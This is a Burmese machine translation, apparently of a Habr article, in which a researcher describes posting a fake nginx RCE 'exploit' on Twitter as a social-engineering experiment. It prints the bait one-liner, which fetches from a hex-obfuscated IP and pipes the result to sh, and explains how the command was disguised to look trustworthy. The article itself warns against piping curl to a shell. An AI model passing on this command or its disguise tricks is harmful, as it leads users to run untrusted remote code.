nginx exploit အတုဖြင့် လူမှုစမ်းသပ်မှုတစ်ခု အောင်မြင်သည်။

မှတ်ချက်။ ဘာသာပြန်: စာရေးသူ ဇွန်လ ၁ ရက်နေ့တွင် ထုတ်ဝေသော မူရင်းမှတ်စုသည် သတင်းအချက်အလက် လုံခြုံရေးကို စိတ်ဝင်စားသူများအကြား စမ်းသပ်မှုတစ်ခု ပြုလုပ်ရန် ဆုံးဖြတ်ခဲ့သည်။ ၎င်းကိုလုပ်ဆောင်ရန် ဝဘ်ဆာဗာတွင် မဖော်ပြထားသော အားနည်းချက်အတွက် အတုအယောင် exploit တစ်ခုကို ပြင်ဆင်ပြီး ၎င်း၏ Twitter တွင် တင်ခဲ့သည်။ သူ၏ယူဆချက် - ကုဒ်တွင်သိသာထင်ရှားသောလှည့်စားမှုကိုတွေ့မြင်မည့်အထူးကုဆရာဝန်များမှချက်ချင်းဖော်ထုတ်ရန် - အကောင်အထည်မဖော်ခဲ့ပါ... ၎င်းတို့သည်မျှော်လင့်ချက်အားလုံးကိုကျော်လွန်သွားသည်နှင့်ဆန့်ကျင်ဘက်အနေဖြင့် - tweet သည်မလုပ်ဆောင်သောလူများစွာထံမှကြီးမားသောထောက်ခံမှုရရှိခဲ့သည် ၎င်း၏အကြောင်းအရာများကိုစစ်ဆေးပါ။

TL;DR- မည်သည့်အခြေအနေမျိုးတွင်မဆို sh သို့မဟုတ် bash တွင် ဖိုင်ပိုက်လိုင်းကို မသုံးပါနှင့်။ ဤသည်မှာ သင့်ကွန်ပြူတာကို ထိန်းချုပ်မှု ဆုံးရှုံးရန် နည်းလမ်းကောင်းတစ်ခုဖြစ်သည်။

မေလ 31 ရက်မှာ ဖန်တီးခဲ့တဲ့ ရုပ်ပြ PoC exploit အကြောင်း အတိုချုံးပြီး မျှဝေချင်ပါတယ်။ သတင်းကို တုံ့ပြန်တဲ့အနေနဲ့ ချက်ခြင်းပေါ်လာတယ်။ Alisa Esage Shevchenkoအဖွဲ့ဝင် သုည Day Initiative (ZDI) သည် NGINX တွင် RCE (အဝေးကုဒ်လုပ်ဆောင်မှု) ကို ဦးတည်စေသော အားနည်းချက်တစ်ခုအကြောင်း အချက်အလက်ကို မကြာမီ ထုတ်ဖော်ပါမည်။ NGINX သည် ဝဘ်ဆိုဒ်များစွာကို အားကောင်းစေသောကြောင့် သတင်းသည် ဗုံးခွဲမှုတစ်ခု ဖြစ်ရပါမည်။ သို့သော် "တာဝန်ရှိထုတ်ဖော်ခြင်း" လုပ်ငန်းစဉ်တွင် နှောင့်နှေးမှုများကြောင့် ဖြစ်ပျက်ခဲ့သည့် အသေးစိတ်အချက်အလက်များကို မသိရ - ဤသည်မှာ စံ ZDI လုပ်ငန်းစဉ်ဖြစ်သည်။

tweet ပါ။ NGINX တွင် အားနည်းချက် ထုတ်ဖော်မှုအကြောင်း

curl တွင် obfuscation နည်းပညာအသစ်တစ်ခုအား လုပ်ဆောင်ပြီးသောအခါ၊ ကျွန်ုပ်သည် မူရင်း tweet ကိုကိုးကားပြီး ရှာဖွေတွေ့ရှိထားသည့်အားနည်းချက်ကို အသုံးချသည်ဟု ယူဆရသော ကုဒ်လိုင်းတစ်ခုပါရှိသော "အလုပ်လုပ်သော PoC" ကို ပေါက်ကြားခဲ့သည်။ ဟုတ်ပါတယ်၊ ဒါက လုံးဝကို အဓိပ္ပါယ်မရှိဘူး။ ငါချက်ချင်းဖော်ထုတ်ခံရလိမ့်မယ်ထင်တယ်၊ အကောင်းဆုံးကတော့ retweet နှစ်ခုရလိမ့်မယ် (အိုး ကောင်းပြီ)။

tweet ပါ။ အတုအယောင်များဖြင့်

ဒါပေမယ့် နောက်ဘာတွေဆက်ဖြစ်မလဲဆိုတာတော့ တွေးကြည့်လို့ မရဘူး။ ကျွန်ုပ်၏ tweet ၏ရေပန်းစားမှုသည် တဟုန်ထိုးတက်လာသည်။ အံ့သြစရာကောင်းတာက၊ လောလောဆယ် (15:00 မော်စကိုစံတော်ချိန် ဇွန်လ 1 ရက်) မှာ လူအနည်းငယ်က ဒါဟာ အတုဖြစ်ကြောင်း သဘောပေါက်သွားပါပြီ။ လူအတော်များများက ၎င်းကို လုံးဝမစစ်ဆေးဘဲ ပြန်တင်ကြသည် (၎င်းထွက်ရှိထားသော ချစ်စရာကောင်းသော ASCII ဂရပ်ဖစ်ကို သဘောကျနေနေသာသာ)။

ကြည့်လိုက်ရုံနဲ့ ဘယ်လောက်လှလဲ!

ဤအကွက်များနှင့် အရောင်များအားလုံးသည် ကောင်းမွန်သော်လည်း၊ လူများသည် ၎င်းတို့ကိုမြင်ရန် ၎င်းတို့၏စက်တွင် ကုဒ်ကို run ရမည်မှာ ထင်ရှားပါသည်။ ကံကောင်းစွာဖြင့်၊ ဘရောက်ဆာများသည် ထိုနည်းအတိုင်းအလုပ်လုပ်ပြီး ကျွန်ုပ်သည် တရားဥပဒေအရ ပြဿနာမ၀င်စေလိုသည့်အချက်နှင့် ပေါင်းစပ်ကာ၊ ကျွန်ုပ်၏ဆိုက်တွင် မြှုပ်နှံထားသောကုဒ်သည် နောက်ထပ်ကုဒ်ကို ထည့်သွင်းရန် သို့မဟုတ် လုပ်ဆောင်ရန် မကြိုးစားဘဲ ပဲ့တင်သံခေါ်ဆိုမှုများ ပြုလုပ်နေခြင်းဖြစ်သည်။

သေးငယ်သော ကွဲပြားမှု- netspooky, dnzငါနဲ့ အဖွဲ့ထဲက တခြားကောင်တွေ လူမိုက် ကျွန်ုပ်တို့သည် curl command များကို ရှုပ်ယှက်ခတ်ရန် နည်းလမ်းအမျိုးမျိုးဖြင့် ကစားနေသည်မှာ အတော်အေးနေပြီဖြစ်သောကြောင့်၊ ကျွန်ုပ်တို့သည် အလွန်မိုက်ပါသည်။ netspooky နှင့် dnz တို့သည် ကျွန်ုပ်အတွက် အလွန်အလားအလာကောင်းပုံပေါက်သည့် နည်းလမ်းသစ်များစွာကို ရှာဖွေတွေ့ရှိခဲ့သည်။ ပျော်ရွှင်မှုတွင် ပါဝင်ခဲ့ပြီး လှည့်ကွက်များအိတ်ထဲသို့ IP ဒဿမကူးပြောင်းမှုများကို ထည့်သွင်းရန် ကြိုးစားခဲ့သည်။ IP ကိုလည်း hexadecimal ဖော်မတ်သို့ ပြောင်းနိုင်သည်ကို တွေ့ရပါသည်။ ထို့အပြင်၊ curl နှင့် အခြားသော NIX ကိရိယာအများစုသည် hexadecimal IP များကို ပျော်ရွှင်စွာစားကြသည်။ ဒါကြောင့် ယုံကြည်စိတ်ချရပြီး လုံခြုံတဲ့ပုံသဏ္ဍာန်ရှိတဲ့ command line တစ်ခုကို ဖန်တီးဖို့ကိစ္စပဲ ဖြစ်ပါတယ်။ နောက်ဆုံးတော့ ဒီတစ်ခုအပေါ်မှာ ငါဆုံးဖြတ်ခဲ့တယ်

curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost

လူမှု-အီလက်ထရွန်းနစ်အင်ဂျင်နီယာ (SEE) - ဖြားယောင်းခြင်းသက်သက်ထက် ပိုသည်။

ဘေးကင်းမှုနှင့် ရင်းနှီးကျွမ်းဝင်မှုသည် ဤစမ်းသပ်မှု၏ အဓိကအစိတ်အပိုင်းတစ်ခုဖြစ်သည်။ အဲဒါတွေက သူ့ရဲ့အောင်မြင်မှုကို ဖြစ်ပေါ်စေတယ်လို့ ကျွန်တော်ထင်ပါတယ်။ အမိန့်ပေးစာကြောင်းသည် "127.0.0.1" (လူသိများသော localhost) ကိုရည်ညွှန်းခြင်းဖြင့် လုံခြုံရေးကို ရှင်းရှင်းလင်းလင်းဖော်ပြပါသည်။ Localhost သည် လုံခြုံသည်ဟု ယူဆပြီး ၎င်းပေါ်ရှိ ဒေတာသည် သင့်ကွန်ပြူတာကို ဘယ်တော့မှ မထားခဲ့ပါ။

ရင်းနှီးမှုသည် စမ်းသပ်မှု၏ ဒုတိယအဓိကသော့ချက် SEE အစိတ်အပိုင်းဖြစ်သည်။ ပစ်မှတ်ပရိသတ်သည် အဓိကအားဖြင့် ကွန်ပျူတာလုံခြုံရေး၏ အခြေခံများနှင့် ရင်းနှီးသူများဖြစ်သောကြောင့်၊ ၎င်းအစိတ်အပိုင်းများကို ရင်းနှီးပြီး ရင်းနှီးပုံပေါက်စေရန်အတွက် ကုဒ်ဖန်တီးရန် အရေးကြီးပါသည်။ အသုံးချမှု အယူအဆဟောင်းများ၏ အစိတ်အပိုင်းများကို ငှားရမ်းပြီး ပုံမှန်မဟုတ်သော နည်းလမ်းဖြင့် ပေါင်းစပ်ခြင်းသည် အလွန်အောင်မြင်ကြောင်း သက်သေပြပါသည်။

အောက်တွင်ဖော်ပြထားသည်မှာ one-liner ၏အသေးစိတ်ခွဲခြမ်းစိတ်ဖြာချက်ဖြစ်သည်။ ဤစာရင်းတွင်ပါသော အရာအားလုံးသည် အကျုံးဝင်သည်။ အလှကုန်သဘာဝ၊ လက်တွေ့အားဖြင့် ၎င်း၏ လက်တွေ့လုပ်ဆောင်မှုအတွက် မည်သည့်အရာမျှ မလိုအပ်ပါ။

တကယ်လိုအပ်တဲ့ အစိတ်အပိုင်းတွေက ဘာတွေလဲ။ ဒီ -gsS, -O 0x0238f06a, |sh နှင့် web server ကိုယ်တိုင်။ ဝဘ်ဆာဗာတွင် အန္တရာယ်ရှိသော ညွှန်ကြားချက်များ မပါဝင်သော်လည်း ASCII ဂရပ်ဖစ်များကို အမိန့်ပေးချက်များကို အသုံးပြု၍ ရိုးရိုးရှင်းရှင်း လုပ်ဆောင်ခဲ့သည်။ echo ဇာတ်ညွှန်းတွင်ပါရှိသည်။ index.html. အသုံးပြုသူသည် လိုင်းတစ်ခုနှင့် ဝင်လာသောအခါ |sh အလယ်တွင်, index.html တင်ပြီး ကွပ်မျက်သည်။ ကံကောင်းထောက်မစွာ၊ ဝဘ်ဆာဗာ၏ထိန်းသိမ်းသူများသည် မကောင်းသောရည်ရွယ်ချက်မရှိခဲ့ပါ။

• ../../../%00 - လမ်းညွှန်ကိုကျော်လွန်သွားခြင်းကိုကိုယ်စားပြုသည်။
• ngx_stream_module.so - ကျပန်း NGINX မော်ဂျူးဆီသို့ လမ်းကြောင်း။
• /bin/sh%00<'protocol:TCP' - ကျွန်ုပ်တို့ စတင်လုပ်ဆောင်နေပါသည်။ /bin/sh ပစ်မှတ်စက်ပေါ်တွင် အထွက်ကို TCP ချန်နယ်သို့ ပြန်ညွှန်းပါ။
• -O 0x0238f06a#PLToffset - လျှို့ဝှက်ပါဝင်ပစ္စည်း၊ ဖြည့်စွက် #PLToffsetPLT တွင်ပါရှိသော Memory offset နှင့်တူစေရန်၊
• |sh; - နောက်ထပ်အရေးကြီးသောအပိုင်း။ ကျွန်ုပ်တို့သည် တိုက်ခိုက်နေသော ဝဘ်ဆာဗာမှလာသော ကုဒ်ကို လုပ်ဆောင်ရန်အတွက် အထွက်ကို sh/bash သို့ ပြန်ညွှန်းရန် လိုအပ်ပါသည်။ 0x0238f06a (2.56.240.x);
• nc /dev/tcp/localhost - netcat ကိုရည်ညွှန်းသော dummy /dev/tcp/localhostဒါမှ အရာအားလုံးကို ပြန်ပြီး လုံခြုံစေမှာပါ။ တကယ်တော့ ဒါဟာ ဘာမှမလုပ်ဘဲ အလှအပအတွက် လိုင်းထဲမှာပါ၀င်ပါတယ်။

၎င်းသည် တစ်ကြောင်းတည်းသော ဇာတ်ညွှန်းကို ကုဒ်ဆွဲခြင်းနှင့် "လူမှု-အီလက်ထရွန်းနစ် အင်ဂျင်နီယာ" (ရှုပ်ထွေးသော ဖြားယောင်းခြင်း) ၏ ရှုထောင့်များအကြောင်း ဆွေးနွေးမှုကို နိဂုံးချုပ်သည်။

ဝဘ်ဆာဗာဖွဲ့စည်းပုံနှင့် တန်ပြန်ဆောင်ရွက်မှုများ

ကျွန်ုပ်၏စာရင်းသွင်းသူအများစုသည် infosec/hackers များဖြစ်သောကြောင့်၊ ကျွန်ုပ်သည် ၎င်းတို့ဘက်မှ “စိတ်ဝင်စားမှု” ဟူသောဖော်ပြချက်များကို အနည်းငယ်ခံနိုင်ရည်ရှိစေရန်၊ တည်ဆောက်သည်)။ စမ်းသပ်မှု ဆက်လက်လုပ်ဆောင်နေသေးသဖြင့် ဤနေရာ၌ ကျရောက်နေသော ချို့ယွင်းချက်အားလုံးကို ကျွန်ုပ်စာရင်းတွင် မဖော်ပြတော့ဘဲ ဤအရာများသည် ဆာဗာမှ လုပ်ဆောင်သည့် အရာအချို့ဖြစ်သည်-

• အချို့သော လူမှုကွန်ရက်များတွင် ဖြန့်ဖြူးမှု ကြိုးပမ်းမှုများကို တက်ကြွစွာ စောင့်ကြည့်စစ်ဆေးပြီး လင့်ခ်ကို နှိပ်ရန် သုံးစွဲသူအား အားပေးရန်အတွက် အမျိုးမျိုးသော အကြိုကြည့်ရှုမှု ပုံသေးများကို အစားထိုးသည်။
• Shell script ကိုပြသမည့်အစား Thugcrowd ပရိုမိုးရှင်းဗီဒီယိုသို့ Chrome/Mozilla/Safari/etc ကို ပြန်ညွှန်းသည်။
• ကျူးကျော်ဝင်ရောက်ခြင်း/ ပြောင်ပြောင်တင်းတင်း ဟက်ကာများ၏ သိသာထင်ရှားသော လက္ခဏာများကို စောင့်ကြည့်ပြီးနောက် NSA ဆာဗာများသို့ တောင်းဆိုချက်များကို ပြန်ညွှန်းခြင်း စတင်သည် (ဟ!)။
• ပုံမှန်ဘရောက်ဆာမှ အသုံးပြုသူများသည် ပုံမှန်ဘရောက်ဆာမှ host သို့လာရောက်လည်ပတ်သော ကွန်ပျူတာများအားလုံးတွင် Trojan နှင့် BIOS rootkit တစ်ခုတို့ကို ထည့်သွင်းပေးသည် (နောက်တာပါ)။

Antimers ၏သေးငယ်သောအစိတ်အပိုင်း

ဤကိစ္စတွင်၊ ကျွန်ုပ်၏တစ်ခုတည်းသောရည်မှန်းချက်မှာ Apache ၏အင်္ဂါရပ်အချို့ကိုကျွမ်းကျင်ရန်ဖြစ်သည် - အထူးသဖြင့်၊ တောင်းဆိုချက်များကိုပြန်လည်ညွှန်းခြင်းအတွက်အေးမြသောစည်းမျဉ်းများ - အဘယ်ကြောင့်နည်း။

NGINX Exploit (Real!)

စာရင်းသွင်းပါ @alisaesage Twitter ပေါ်တွင် နှင့် NGINX တွင် အလွန်မှန်ကန်သော အားနည်းချက်များကို ဖြေရှင်းရန်နှင့် အခွင့်အလမ်းများကို အသုံးချရန် ZDI ၏ ကောင်းမွန်သော အလုပ်များကို လိုက်နာပါ။ သူတို့ရဲ့အလုပ်က ကျွန်တော့်ကို အမြဲစွဲလန်းစေခဲ့ပြီး ကျွန်တော့်ရဲ့မိုက်မဲတဲ့ tweet တွေအားလုံးကို ဖော်ပြချက်တွေနဲ့ အသိပေးချက်တွေကို စိတ်ရှည်သည်းခံတဲ့အတွက် အဲလစ်ကို ကျေးဇူးတင်ပါတယ်။ ကံကောင်းထောက်မစွာဖြင့်၊ ၎င်းသည် NGINX အားနည်းချက်များကို သိရှိလာစေရန်နှင့် curl ကိုအလွဲသုံးစားလုပ်ခြင်းကြောင့်ဖြစ်ရသည့် ပြဿနာများကို မြှင့်တင်ပေးပါသည်။

source: www.habr.com